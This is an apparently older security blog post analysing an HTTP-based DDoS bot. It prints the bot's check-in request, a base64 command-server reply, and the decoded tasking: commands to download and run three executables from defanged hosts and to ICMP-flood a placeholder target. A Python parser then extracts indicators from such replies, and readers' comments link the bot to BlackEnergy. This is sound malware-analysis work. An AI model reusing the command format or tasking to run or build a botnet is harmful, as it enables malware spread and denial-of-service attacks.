HTTP-based Botnets

We observe more and more botnets using HTTP-based communication channels. Quite often, these bots are used for DDoS attacks as the following example explains. We recently analyzed a bot with CWSandbox (MD5: 112ccb580b0013f967b6ba991802850d) that first performs the usual steps during a bot infection, e.g., copying itself to the Windows system folder and adding registry keys such that the bot is started as a service after a reboot. The bot then issues the following (obfuscated) HTTP request:
POST /ddd/stat.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: life-tablets.xxx
Content-Length: 27
Cache-Control: no-cache

id=xMACHINENAME_0&build_id=1362B8E


The answer from the server is:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Jun 2008 19:59:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close

fc
MTA7MjAwMDsxMDsxOzA7MzA7MTAwOzM7MjA7MTAwMDsy
MDAwI2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lL2kuZXhl
O2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lLzEwMDAuZXh
lO2dldCBodHRwOi8vbGlmZS10YWJsZXRzLmNuL2xmL2xvY
WQuZXhlO2Zsb29kIGljbXAgbGliZXJ0eXJlc2VydmVkaXJlY3R
vcnkuY29tIzEwIw==
0

The response is base64-encoded and decoding leads to the following (obfuscated) commands:
10;2000;10;1;0;30;100;3;20;1000;2000#
get hxxp://dftreo.xxx/lf/e/i.exe;
get hxxp://dftreo.xxx/lf/e/1000.exe;
get hxxp://life-tablets.xxx/lf/load.exe;
flood icmp TARGET.COM&10;

Thus the bot downloads and executes three additional malware binaries on the compromised machine, and it also starts an ICMP-based DDoS attack against the specified target.
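Reassembling the chunked response, base64-decoding it and splitting the tasking into its parameter header and command list is exactly what an analyst does when turning such a capture into indicators (download URLs, flood targets). The following Python is an added example, not code from the post or from CWSandbox. It assumes the format that the decoded text above suggests: an integer header separated by ";", a "#" between header and commands, and commands separated by ";". The sample tasking is constructed from the post's obfuscated values (hxxp://…xxx, TARGET.COM); the trailing parameter after the flood target is omitted because its delimiter is not clear from the post.

```python
import base64
from dataclasses import dataclass, field
from typing import List, Tuple


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a 'Transfer-Encoding: chunked' body: hex size line, data, CRLF, ..., '0'."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0].strip(), 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:  # last-chunk marker ("0" in the post's response)
            break
        out += body[pos:pos + size]
        pos += size + 2  # skip the data and its trailing CRLF
    return bytes(out)


@dataclass
class BotTasking:
    params: List[int]                                   # numeric header, meaning unknown here
    downloads: List[str] = field(default_factory=list)  # URLs from "get" commands
    floods: List[Tuple[str, str]] = field(default_factory=list)  # (method, target)
    other: List[str] = field(default_factory=list)      # anything we do not recognise


def parse_tasking(text: str) -> BotTasking:
    """Split '<ints;...>#cmd;cmd;...' into a structured tasking (format assumed, see lead-in)."""
    header, _, commands = text.partition("#")
    tasking = BotTasking(params=[int(x) for x in header.split(";") if x])
    for cmd in filter(None, (c.strip() for c in commands.split(";"))):
        verb, *args = cmd.split()
        if verb == "get" and args:
            tasking.downloads.append(args[0])
        elif verb == "flood" and len(args) >= 2:
            tasking.floods.append((args[0], args[1]))
        else:
            tasking.other.append(cmd)
    return tasking


def extract_iocs(raw_response_body: bytes) -> BotTasking:
    """Chunked body -> base64 -> tasking; this is the full path from capture to indicators."""
    decoded = base64.b64decode(decode_chunked(raw_response_body).strip())
    return parse_tasking(decoded.decode("ascii", errors="replace"))


def make_chunked(payload: bytes, chunk_size: int) -> bytes:
    """Build a chunked body for the constructed sample (the real server used a single chunk)."""
    parts = [b"%x\r\n%s\r\n" % (len(payload[i:i + chunk_size]), payload[i:i + chunk_size])
             for i in range(0, len(payload), chunk_size)]
    parts.append(b"0\r\n\r\n")
    return b"".join(parts)


# Constructed sample tasking, using the post's obfuscated placeholders rather than real domains.
SAMPLE_TASKING = (
    "10;2000;10;1;0;30;100;3;20;1000;2000#"
    "get hxxp://dftreo.xxx/lf/e/i.exe;"
    "get hxxp://dftreo.xxx/lf/e/1000.exe;"
    "get hxxp://life-tablets.xxx/lf/load.exe;"
    "flood icmp TARGET.COM"
)
SAMPLE_BODY = make_chunked(base64.b64encode(SAMPLE_TASKING.encode("ascii")), 64)

if __name__ == "__main__":
    tasking = extract_iocs(SAMPLE_BODY)
    print("header params:", tasking.params)
    for url in tasking.downloads:
        print("download IoC:", url)
    for method, target in tasking.floods:
        print(f"DDoS tasking: {method} flood against {target}")
```

Feeding `extract_iocs` the body of a captured response gives the URL list to block or hunt for in proxy logs and the flood target to notify; anything the parser does not recognise lands in `other` so new command verbs are not silently dropped.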


Comments


  1. SonNP says:

    These bots look like BlackEnergy variants or based on the BlackEnergy idea.

  2. Thorsten says:

    Yes, this is related to the ideas / techniques introduced by BlackEnergy.

  3. Pandi says:

    Is it this tool?
    http://research.pandasecurity.com/archive/The-rise-of-the-2800_http_2900-botnet.aspx
